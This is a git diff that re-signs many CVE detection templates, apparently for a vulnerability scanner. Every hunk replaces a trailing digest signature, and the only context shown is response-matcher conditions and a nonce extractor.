4b0a00483046022100fc3a47263f7babfff09eac1ce8a5de5ac19c63e853d4e90804da002880a18109022100c5e3852e81329ca6eb06f6e5779c1d722ac578ec4f74f73ca284c7ad67d367d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-27320.yaml b/http/cves/2021/CVE-2021-27320.yaml index c0543597ca..d879c75bd9 100644 --- a/http/cves/2021/CVE-2021-27320.yaml +++ b/http/cves/2021/CVE-2021-27320.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "Medical Management System")' condition: and -# digest: 4b0a00483046022100e19069ba819c51cbb906a921026dc33a3ea4777dfdfde261cd3eecc4bdf2f60b022100aaff811bc5771e0fa07652ec9066319676fe5ee3edf3f665b969a24c584788c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220153004a0e168cfb9d937164ef1e1d4085ca6f498cbe11e517f162873f2094f1f02207bc78cae2230febb403b765b6ae5f3a17b24fdbf2ea083a7672629a8fc420158:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index d190e3056e..c3d7d38405 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "average_grade")' condition: and -# digest: 490a0046304402204d4902f51f560fcf0ded1e355944479986a26099d29a7f3247c2c0a35fb533e402204b3ddd6af36676a8993b163161d15f67e560f97d3e61e4a0d1cd13004d189c64:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022017d64e2bcae0f187ce3857267bdda7bb3f7c956f2f6c62028916929f30883ffd022100c627319a056fd24f0bd2267d75af6075cc71aef79ef43d236a377a56d7c4f5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2021/CVE-2021-39165.yaml b/http/cves/2021/CVE-2021-39165.yaml index 5532be45c6..fb34974733 100644 --- a/http/cves/2021/CVE-2021-39165.yaml +++ b/http/cves/2021/CVE-2021-39165.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "pagination") && contains(body, "data")' condition: and -# digest: 4a0a0047304502207d446c3957624653dc008a7ab15069eeed694d1099c94c6c977a81d0102dd05a022100d4e4d4f86b4d2f06d8966f18d607297ad2bc92f0fe4a9083ec4da8b419a74743:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022034663351e65790c6811b5d318fe212fedff9d5eac2aeb9c01e05122b56f7f0a302204e86e7e7ff57fe1b1e17e7e1e84b05165b4878951b171a7d025162d75e4dca52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0228.yaml b/http/cves/2022/CVE-2022-0228.yaml index d245f39b89..aaf26b7d59 100644 --- a/http/cves/2022/CVE-2022-0228.yaml +++ b/http/cves/2022/CVE-2022-0228.yaml @@ -52,4 +52,4 @@ http: - 'contains_all(body_2, "first name", "last name", "email")' - 'contains(content_type_2, "application/octet-stream")' condition: and -# digest: 4b0a00483046022100a5e5bdb6821dc08d643eb1c9f95862b8116cf731542887e87ce5a5ed42b204700221008d7575ffb8f524c90d05db2e9bbd5e0ce26c0b8e227622602cd1f104061c73c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bf716bf9543e60115d96900d93a63ba1b0d62e7936b9c6a98688c71a43256702022100b8d5167cf275f82cfabcd3f5b016e33e9b8b36b5bd4a78d1a9cf1814ed8a453a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 97f247925e..dc416df44d 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "\"data\":{\"success\":true}")' condition: and -# digest: 4a0a00473045022066280e6a47e91352d98cb30291c051553c64ce566f4b4058a6b38c69f618dca2022100e774340b4d23c31810dcf915c1a593ca0237c07a9dfd39f79842b6feaca32ca3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100af31781e382fb73a08452401889431cc023d94e6e793e41597937b41cc2a5580022100fcbd14f71e6b2da2240a56aa46dbfaadcc3b3f8b279ba313effc07c87ad27b01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0412.yaml b/http/cves/2022/CVE-2022-0412.yaml index 1e8e887378..41c119176a 100644 --- a/http/cves/2022/CVE-2022-0412.yaml +++ b/http/cves/2022/CVE-2022-0412.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 400 -# digest: 4b0a00483046022100b6e4d0f3cf3083a6266de8390edc1edef6d598356cfce15241e5e052a6bcf2ff022100b035a1ed11b0738ead2d5d28393b784c66d899fee448212efc636ff59b11add8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bf6465b533da10a708e3590108af2902d2a31c0c163cf47151dd80876b90ecd902201150103e2c55f6df450110650eb092713f43dfb7372cd868af8565bb86621dde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0651.yaml b/http/cves/2022/CVE-2022-0651.yaml index 65db5bbdbb..0f96a768ff 100644 --- a/http/cves/2022/CVE-2022-0651.yaml +++ b/http/cves/2022/CVE-2022-0651.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 490a004630440220035f12a4154a350d60447d690b6c52d7ff3ec9d78006be2879d49e848dd1ddf10220529c5ae15af4a1889b7ccb1e505d046daf41c212c9ff5926ad7818f19e2f5c12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e26860d278f256bcc846af089c9e6eb40d552ede910fbddb3c5619c1b9cf2969022100d2adf42556aee426785fa1e641f4bf677935e837fd990f2f24efda812ebde0c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0658.yaml b/http/cves/2022/CVE-2022-0658.yaml index 64e36e0d4b..d007614a01 100644 --- a/http/cves/2022/CVE-2022-0658.yaml +++ b/http/cves/2022/CVE-2022-0658.yaml @@ -47,4 +47,4 @@ http: - 'contains(header, "application/json")' - 'contains(body, "partiallyBookedDays") && contains(body, "lockDays")' condition: and -# digest: 4a0a00473045022100dea516f929140a2e2296985cd78a610dc540408796d4ac65fb462ea4200221ec02204757fe9ea8722ca648c35531743432d486f7d889c7b60b6529123bd0d7c443bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009f6a62af9597b8c3d1910fadc250bad189b5a22c33e78d82e1a10b161f3572bc02205145b6a9ccf3b69a6a8bd23c1353e7ba90db663888256e6bd5ab81d8f64f7864:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0693.yaml b/http/cves/2022/CVE-2022-0693.yaml index 5238432c35..ea4c100b11 100644 --- a/http/cves/2022/CVE-2022-0693.yaml +++ b/http/cves/2022/CVE-2022-0693.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 200' - 'contains(body, "Post Meta Setting Deleted Successfully")' condition: and -# digest: 490a0046304402204f01877da9668618a31c134174c0b1db2eeb1fd33ee26b77bdd0fed4b5a611dd02206407d8588548171f5e8dc630122584d4c228b43379770ceaa7dfd300e960c4e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e693d603ea6398215e74879c15e496047477f4343461046dac6e9ae027bde52902206665f561033c3f6a9d32e975ea9da5abffdb99689fb2c1b499ad084cb8702f25:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0747.yaml b/http/cves/2022/CVE-2022-0747.yaml index eea10a4bfd..93d8dfc128 100644 --- a/http/cves/2022/CVE-2022-0747.yaml +++ b/http/cves/2022/CVE-2022-0747.yaml @@ -52,4 +52,4 @@ http: - 'contains(content_type_2, "text/javascript")' - 'contains(body_2, "show_ilist_templates")' condition: and -# digest: 490a004630440220659dd6e81b56b7ad2ca5e164674d68e908074273a0e522aa11bbe64016520f3a02207cd44466e380af3765f85808195b17dc6e318a354fb70704520099f6e978103e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022065454519399c9c6f45787b0ff07a1b1773963ffb30db52102b08645e7aee8dcd02205ea41986885d388e85018ef9d86da90d4b452efce0318bc0e0fb74cab0714064:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0760.yaml b/http/cves/2022/CVE-2022-0760.yaml index 866e47810e..f5c4ff517c 100644 --- a/http/cves/2022/CVE-2022-0760.yaml +++ b/http/cves/2022/CVE-2022-0760.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "vote_status") || contains(body, "critical error")' condition: and -# digest: 4a0a004730450221008335e1b503013fdf95af325dc2cd7775ecc4a69d509ffd7d9f3e058d0d0f0f36022040ddab9ea922ffdf58d0e2f057aad3e53d5c0ff7946897f4d3f3da3105c0776d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de19f0c89c65bdd3d6e4f1ab16529ddcc17caef25172961832f4097889b0648b022066bcb91b91972cca839d631d32692be65ca3fb593a5bd40a879598c22aca1448:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0769.yaml b/http/cves/2022/CVE-2022-0769.yaml index 7cec3a1707..86f65e72a2 100644 --- a/http/cves/2022/CVE-2022-0769.yaml +++ b/http/cves/2022/CVE-2022-0769.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "You have to be logged in to leave your rate")' condition: and -# digest: 4a0a0047304502202c86f8644cb483f5c622c81dc5f3c84f10db3835fa21a49497270c6ef42cc868022100d4fcdb326b1bb65c5056f8e677aad1fe82328ed18bc6d80f5890f2456e405b8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022051e07e9fad1853ad143f9747a2830720208c1b7d848b081c1877243a6b6a9cc7022100a79cf97012038bd6c899595add46debc31ddf60d43344074f6a7042defceebb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0773.yaml b/http/cves/2022/CVE-2022-0773.yaml index 24d85d83be..222ad94d00 100644 --- a/http/cves/2022/CVE-2022-0773.yaml +++ b/http/cves/2022/CVE-2022-0773.yaml @@ -51,4 +51,4 @@ http: - 'contains(content_type_1, "text/html")' - 'contains(body_1, "([])") && contains(body_2, ".documentor-help")' condition: and -# digest: 490a0046304402205f2cc03db340617761a1fa935180c834e2ffa82c932c1189a14dfcb1d06333f70220105b6b52747cdf5d6f4ad6ca85ab86c5cd0f844d3a8a8d75cec26b186467f283:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a297207b55918fa80abc7b2fabd54eebf93cc3e98c031b8fb74ab0b54739296022012e42fafada21fb35db7eab86787a32a560b2da932303f1ffe2a6967aaa1b1d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0784.yaml b/http/cves/2022/CVE-2022-0784.yaml index 1cc12bce2d..d6ccfd0efe 100644 --- a/http/cves/2022/CVE-2022-0784.yaml +++ b/http/cves/2022/CVE-2022-0784.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "{\"images\":")' condition: and -# digest: 490a00463044021f1195a13a42ffdab24fe1a153051ee57e125fe5d1aa81e77333ae6af0d54794022100de53b58284ec8656a4b09537d5f58ff210002891439cc282e725071c8681e4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b51bc538dbe9eb8b81c9a46c95f53fac7b85bbaf5684f20e891460214c539d0902203cd29b53302e0cc5fa161915570cc9de65b35f769c9d797445a00e3c0b8770eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0785.yaml b/http/cves/2022/CVE-2022-0785.yaml index 6224663c84..c585e6e7b6 100644 --- a/http/cves/2022/CVE-2022-0785.yaml +++ b/http/cves/2022/CVE-2022-0785.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "dptTimetable customStyles dptUserStyles")' condition: and -# digest: 4a0a004730450220339f76f6589f61d951c6df49eebd9765622f4b1fc106f4f0baaa2c769568a0a2022100c9f4eb1905e780de95cb4f89bc8dcebc93ad8fa3134478bb83af9abf03ee8be7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220378d854bb8f28e49f9e65a11242638788ce63730696c9a768b80cbcaf04f394f022024e9f6367047c59dd724b93deabe92095ec7fe5901c1ab72fa6f038b980d7bab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0786.yaml b/http/cves/2022/CVE-2022-0786.yaml index 2d6abb3f5d..3e987651a3 100644 --- a/http/cves/2022/CVE-2022-0786.yaml +++ b/http/cves/2022/CVE-2022-0786.yaml @@ -47,4 +47,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Doctor details")' condition: and -# digest: 4a0a0047304502202a56024067a27384463e32cf94905a97b100cc76d3a7f2e0129ad457e5630b20022100bb7206169a39c10a0a38f769961c00d3cbb7a2b161ead9618270e7b6ace9395a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094f4a84c32850306a9912fc54dab1cce497aca3ad31b35a4af79c06f7e653de3022100b93e017cc2bdde695bc9f40ec562bc59bdd7ebf2d10a39440bb4c61016adc704:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0787.yaml b/http/cves/2022/CVE-2022-0787.yaml index 0bc1632811..8d6cf2daa0 100644 --- a/http/cves/2022/CVE-2022-0787.yaml +++ b/http/cves/2022/CVE-2022-0787.yaml @@ -46,4 +46,4 @@ http: - contains(header, "text/html") - contains(body, 'iTotalDisplayRecords') condition: and -# digest: 4a0a00473045022100df4f7156bb701e694be126c2abe6eb09e5622b1cead273ab0e888a73d87dce8a02206a9b7211d792d45b6daaee2e7c7258fb8bcae7c9f8266b6b0312c01be218ec65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202120fd60a49a9ad2129fa0c1295710b0b3936bd777ef6632dcfee0fbb09e8adb022100a0ab87653ba456f6b9e4a6dc4123ae9a8e976284a60c0ec8d08a06b6a6630794:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0788.yaml b/http/cves/2022/CVE-2022-0788.yaml index 4c4842c703..6ea6c19834 100644 --- a/http/cves/2022/CVE-2022-0788.yaml +++ b/http/cves/2022/CVE-2022-0788.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "application/json")' - 'contains(body, "Invalid payment.")' condition: and -# digest: 4a0a0047304502203494c2230989c5f71f85250dd906fc72494d29c3e4bf6084791c65bb4734921a022100ecef4474e9c6722b9cfcab205809d07c8692763004fb0cd88d618ea14c276154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ab157f53f7aeb426a1ae70c22aeeb3a2de7b551e5c584f23c48a6dbc9a5efdac022074d8b85768ec6026da338f19ce9836e2c0d546a9ab033bd53488a97a700402f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0826.yaml b/http/cves/2022/CVE-2022-0826.yaml index 1a9c622c3b..2cd54377e5 100644 --- a/http/cves/2022/CVE-2022-0826.yaml +++ b/http/cves/2022/CVE-2022-0826.yaml @@ -50,4 +50,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Registred videos :")' condition: and -# digest: 490a0046304402202a667e41a338568765d9f7aa1f4bdaba5ba1fe329f7e76d1604f88b8b15c86300220781f39a95fdbf7a898f37621269bdffe2dc51e93cfba278a4a03db4d358afdff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022007b8f2b42d4f7135fb49e52ece5e0caea22a8e6dddbaca544b7ced5a362d095f02200b55556cfb540bccd8cf6e89af1fa4356eeb9804feb1ae98d7dffc72b3d49628:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0827.yaml b/http/cves/2022/CVE-2022-0827.yaml index 6f49e12293..7eee4aa2b5 100644 --- a/http/cves/2022/CVE-2022-0827.yaml +++ b/http/cves/2022/CVE-2022-0827.yaml @@ -49,4 +49,4 @@ http: - 'status_code == 200' - 'contains(body, "Account added successfully")' condition: and -# digest: 4b0a00483046022100db95e6660d66b18ab8ce734b9b438e2a4d2626c8b35c7227bb18ddde1a18bcdc022100fb81b33fe69ad1b275eaf4390e07eeb8d34f9fc1035eb938f7f1be4fcb30a916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fee8ac38bbeddcaed2a1ea3ab43d4905849b48bed184b5c52f5aee416f0785bc0220648f311af296481fbe909ccc6a77df5f8d6d3846b66856b566a2e83e74c59cc0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0846.yaml b/http/cves/2022/CVE-2022-0846.yaml index cf8477c1a8..acfc4c289a 100644 --- a/http/cves/2022/CVE-2022-0846.yaml +++ b/http/cves/2022/CVE-2022-0846.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "Your signature has been added") || contains(body, "This petition has already been signed using your email address")' condition: and -# digest: 4a0a00473045022100f67741c7268f279cb65aeea7bd6e21006ec7fbc140f16c09292fd7324b7e65c3022008a10fbbc882ad6157306fc6fe18a7bba2b682010957afea63ab318c8a1406e6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205792eb1e751f64a4caab7bdb395711b0664f20245c95895f1773571431e8c26e022100911dd048def70ff24ea1df7c27fffea6c3c39e6663893fc083d7a71c1bbe084a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0867.yaml b/http/cves/2022/CVE-2022-0867.yaml index 5c9f4775e5..9fff74bafe 100644 --- a/http/cves/2022/CVE-2022-0867.yaml +++ b/http/cves/2022/CVE-2022-0867.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_1, "text/html")' - 'contains(body_2, "ArpPriceTable")' condition: and -# digest: 4a0a0047304502205acfdb90e1d23af6d4df371333fed769d61607fd9c3e4b5d504684e4c5955cb9022100c1180e523047ae2af7505b4105ad97636e07a6515902a90c95f4d254fd6f8149:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202ba4b79f261d32271bc8940226d76ce970973c066a6b6422e7a6c91510786118022100d8033d8cf546f462d016dee3866a74daf9f9d53da9a864fecf9e43edda9de2ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0948.yaml b/http/cves/2022/CVE-2022-0948.yaml index 6774a235c0..7e0515f7a1 100644 --- a/http/cves/2022/CVE-2022-0948.yaml +++ b/http/cves/2022/CVE-2022-0948.yaml @@ -53,4 +53,4 @@ http: - 'contains(content_type_1, "application/json")' - 'contains(body_2, "olistener-action.olistener-controller")' condition: and -# digest: 4b0a00483046022100eac14893041a8c8b601c44e3a29d53238551de310bae8c6ef61bb4d9a4ba9e20022100f9a3583c3b3a0f14ef812ab4680ae4cdf03aa04c581ed3a5b795e520c89b8ddf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022030ed4fd112a63e0042f5cdc36f39f01debffb7dbd9840039894136ad3c0ee89e02201d1d310a9bc5818321ef8dc86784bf6060dc042530e61423fb06361496d7cd89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-0949.yaml b/http/cves/2022/CVE-2022-0949.yaml index 797e4e70a2..1369dda8e1 100644 --- a/http/cves/2022/CVE-2022-0949.yaml +++ b/http/cves/2022/CVE-2022-0949.yaml @@ -61,4 +61,4 @@ http: - 'status_code_2 == 200' - 'contains(body_3, "commentform")' condition: and -# digest: 4a0a00473045022100c9ec786e4d6dc6fef58e041447d7c41a0faee26b64048540df3166806e3b262d02202bde8319975e640eca903001b951c5994d5a9235422120bd5124fe19648dde1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a29b980d03d8f99e2fb5c3ba252732d0d187f45ae5994af3c78ddb7feacd51ba02204a636ddac7f10ade9ea97732673ce9a00d2384cc430243da67f9544e70a64f94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1013.yaml b/http/cves/2022/CVE-2022-1013.yaml index cbd5889df1..af4dc2b932 100644 --- a/http/cves/2022/CVE-2022-1013.yaml +++ b/http/cves/2022/CVE-2022-1013.yaml @@ -49,4 +49,4 @@ http: - 'contains(content_type, "text/html")' - 'contains(body, "\"status\":true,")' condition: and -# digest: 4a0a0047304502205f202d30e53a02bf0d9bce8f26eb6dfdd0a56296e9d4c6491dda7f7cf3034789022100c47a976251ae21ea9971e0f8d125f72f028c6350f6732514ef386e9448d3fae2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac747761c38a53b7dbec7afb1be1c6a16cf56ff69295007e7990f6a43abea66d022021f03eea578a4c67954f68c9185876fe2b76277cd2e7c20c398a2e3f3091de99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1057.yaml b/http/cves/2022/CVE-2022-1057.yaml index 37ce43aed4..d78bb2421b 100644 --- a/http/cves/2022/CVE-2022-1057.yaml +++ b/http/cves/2022/CVE-2022-1057.yaml @@ -46,4 +46,4 @@ http: - 'status_code == 500' - 'contains(body, "been a critical error")' condition: and -# digest: 490a004630440220101c6a007bafbe5c2ecad30655ed17c398ddf531ee9dc351a19c87045fdeddbb02207b672a00e3fa854f2406645d17e9ff44f1c257933afe0f04a7e5331f36ffc3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008ec405bec32380475acf25407ec0f279e047c316eaaf4dca5b04c220b459909502206aedfcc08cec62c96c0ed27c53f4012b2d7bacbdda9c71551905a4ae5570886b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1768.yaml b/http/cves/2022/CVE-2022-1768.yaml index e47277e55c..c5e53f70dd 100644 --- a/http/cves/2022/CVE-2022-1768.yaml +++ b/http/cves/2022/CVE-2022-1768.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207e5c766ba5fcf53fb4eb8ec31610d25babae81ec1f84f5b6986b5cdd17a22e8d02201f6236bebd03b7a10f115990679e2348aeb72a3e47fcac357a9e7ce9f1a46401:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b9ce96ca44588945f941f414618fde7384839982185db15acd701a37e397f2e1022100fdeac1f5189c3830429eba60dd75306a16ba8d35ca55ce3d754a2b43c8487eaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-1883.yaml b/http/cves/2022/CVE-2022-1883.yaml index b8463f79b1..45ea59f999 100644 --- a/http/cves/2022/CVE-2022-1883.yaml +++ b/http/cves/2022/CVE-2022-1883.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210099be5f0bb2305532acb4e0dcc4e9d5019be561850489e904047cce9e28fb97fa022032ed323b5aae0db9ef0ddfb86a47c75bcca951cc1ffd53056e6d6e290f3466f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a90655b3e4e58e6ef33673ef07a93ce26dc7caa8d57453fee376763f767a973022100edf326ddd6c6eed8f9027838a62e4e5ed574315fa9661401bae3efc7038ae7bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-22897.yaml b/http/cves/2022/CVE-2022-22897.yaml index 24ffcd26d3..f0a37af5fb 100644 --- a/http/cves/2022/CVE-2022-22897.yaml +++ b/http/cves/2022/CVE-2022-22897.yaml @@ -94,4 +94,4 @@ http: group: 1 regex: - "\\s*\\s*<\\/version>" -# digest: 4a0a00473045022048f79d8e274737fcf05a789b27d939a38139f8664a6b9990be28a03b0ff151f7022100bb2c0dca25ccfdfcb0a1603920c72ec53ccf92ce2c03efc73f70986de2e7f1b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e88adca020ec0f375280774ce22703bb68e836f73e052282ecdd9ff4d048661e022100b6909fc8af4aba2743fcff18aab29b873d916d3f9abf58522e6a0a3f33ef9118:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24223.yaml b/http/cves/2022/CVE-2022-24223.yaml index 86cd020a3d..cfa516d1ec 100644 --- a/http/cves/2022/CVE-2022-24223.yaml +++ b/http/cves/2022/CVE-2022-24223.yaml @@ -47,4 +47,4 @@ http: - 'status_code == 200' - 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")' condition: and -# digest: 4b0a00483046022100b30222427f9ffd0bdc3e9c961d2d43e58bcaaa1c01926b6710eb7a2c2eec31a2022100f35d98eab9372172d960a8d2af85b2b0160b92776eb2f797098acd5ee6cd32fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074c96424e1ae32ebed889c1369978226cf07c826d53ec09e8bb412818dee9c5f02207390e85d3c8c665c5ecc03407d87d1146b9c6850972340f1962b60833f731dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24265.yaml b/http/cves/2022/CVE-2022-24265.yaml index 9d44c2e1fa..562b5fece6 100644 --- a/http/cves/2022/CVE-2022-24265.yaml +++ b/http/cves/2022/CVE-2022-24265.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "menu/html/edit.php")' condition: and -# digest: 4b0a00483046022100ef926993f56df3d6024e815c648f1444430a5c25d5001fa418f66bc26b3f9961022100c18f80d30dbafc9c6af9bcadca69526a5ee1ba114d5c6ec9aa22599cf01ebcc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022042b674e67cf12dbc5f7407b643fbee106423febb6ddef3d5dd714a1bb5c2e0e102205458a2de5b632db94bc98b81b5178513a8d4d57dddf9fadbfbbdf271e292d3b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-24266.yaml b/http/cves/2022/CVE-2022-24266.yaml index 1741b91789..1c404db422 100644 --- a/http/cves/2022/CVE-2022-24266.yaml +++ b/http/cves/2022/CVE-2022-24266.yaml @@ -55,4 +55,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "list_admin_table")' condition: and -# digest: 4a0a00473045022100f797e0fedb8284864151ffcbe1c564723edd3407aaf65e421fe9173bbee43274022052d98079c837ebbe73b20bfba5ab66f6d6672bd1b568443c2940aaa268c7da03:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009d42af86f6fba9a3f89c71aa8f2ec7f9bfba6dcdca60e6d19774c0725e7aee21022100b666d48bf54f11879033041f9d2eab8cfde8c403a159712fb2e20117a4e14a50:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2467.yaml b/http/cves/2022/CVE-2022-2467.yaml index 516b94de3a..fab96e0846 100644 --- a/http/cves/2022/CVE-2022-2467.yaml +++ b/http/cves/2022/CVE-2022-2467.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100ffddfa5138b805871ea2a646da2d928f9d7c7e4984d7b39c4337da59dc6ffee00221008bb7119b74e219c4da7ebc1abe7299068e74ab28eb036cb85ad8ccdf44bea154:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d62ab2e57ae6439d1953767c74ca80e9be68651118e3cc313d72d21bd94dd6e6022100c232423775d707b294c0796e895b9309bc5347851303a745f5535a924aeee4f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25148.yaml b/http/cves/2022/CVE-2022-25148.yaml index 8982866299..2eff75ea3f 100644 --- a/http/cves/2022/CVE-2022-25148.yaml +++ b/http/cves/2022/CVE-2022-25148.yaml @@ -60,4 +60,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' internal: true -# digest: 4a0a00473045022072faab74dc197723560c42afb7117d0c5715534d9bfb2f93a51100d21e3a444f022100fbf2abb052b030dc6c4cd64af882a4ff76b3228d04087d5bb31ac4ab1c3914ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200acc4152302e7cb1dcdd02c5bc1e604310d3178ba68afc5ed6b44992e419919b022036803d976cfcd045f143a6cc4bb36631a64179509f6ea4833bc57a984ad3c9bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-25149.yaml b/http/cves/2022/CVE-2022-25149.yaml index 011f16ecca..c95a625d44 100644 --- a/http/cves/2022/CVE-2022-25149.yaml +++ b/http/cves/2022/CVE-2022-25149.yaml @@ -59,4 +59,4 @@ http: regex: - '_wpnonce=([0-9a-zA-Z]+)' 